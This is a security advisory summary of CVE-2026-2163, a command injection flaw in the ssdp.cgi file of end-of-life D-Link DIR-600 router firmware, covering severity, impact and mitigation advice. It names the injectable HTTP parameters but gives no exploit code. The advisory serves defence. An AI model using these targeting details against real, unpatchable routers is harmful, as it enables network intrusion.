CVE-2026-2163 is a medium-severity command injection vulnerability affecting the D-Link DIR-600 router firmware up to version 2.15WWb02. The vulnerability exists in the ssdp.cgi file, where manipulation of certain HTTP arguments—HTTP_ST, REMOTE_ADDR, REMOTE_PORT, or SERVER_ID—can lead to injection of arbitrary commands executed with high privileges. This flaw allows a remote attacker to send specially crafted requests to the vulnerable router, triggering command execution without requiring user interaction. The vulnerability is exploitable over the network (AV:N) with low attack complexity (AC:L) but requires the attacker to have high privileges (PR:H), which suggests some form of authentication or elevated access is needed before exploitation. The impact on confidentiality, integrity, and availability is low to limited, as indicated by the CVSS vector. The affected product is no longer supported by D-Link, and no official patches are available. Public exploit code is available, increasing the risk of exploitation by threat actors. The vulnerability could allow attackers to compromise the router, potentially leading to network infiltration, data interception, or further lateral movement within affected environments. Given the age and unsupported status of the device, organizations should consider device replacement or network segmentation to mitigate risk.

The primary impact of CVE-2026-2163 is unauthorized command execution on affected D-Link DIR-600 routers, which can compromise device integrity and potentially allow attackers to manipulate network traffic or gain deeper access into internal networks. Although the CVSS score is medium, the exploitability combined with the availability of public exploit code increases the risk, especially in environments where these legacy devices remain operational. Compromised routers can be used as pivot points for further attacks, including man-in-the-middle, data exfiltration, or launching attacks against other networked systems. The lack of vendor support and patches exacerbates the risk, as vulnerabilities remain unmitigated. Organizations relying on these devices may face increased exposure to cyberattacks, data breaches, and operational disruptions. The threat is particularly relevant for small to medium enterprises and home users who may still use outdated D-Link DIR-600 routers without adequate security controls.

Given the absence of official patches due to end-of-life status, organizations should prioritize replacing the affected D-Link DIR-600 devices with modern, supported hardware that receives regular security updates. If immediate replacement is not feasible, network segmentation should be implemented to isolate vulnerable routers from critical assets and sensitive data. Disable or restrict access to the ssdp.cgi interface and related services if possible, and limit administrative access to trusted networks only. Employ network-level protections such as firewalls and intrusion detection/prevention systems to monitor and block suspicious traffic targeting the vulnerable parameters. Regularly audit network devices for outdated firmware and maintain an inventory to identify unsupported hardware. Educate users and administrators about the risks of legacy devices and encourage timely upgrades. Additionally, consider deploying network anomaly detection tools to identify unusual command injection attempts or exploitation activity targeting these routers.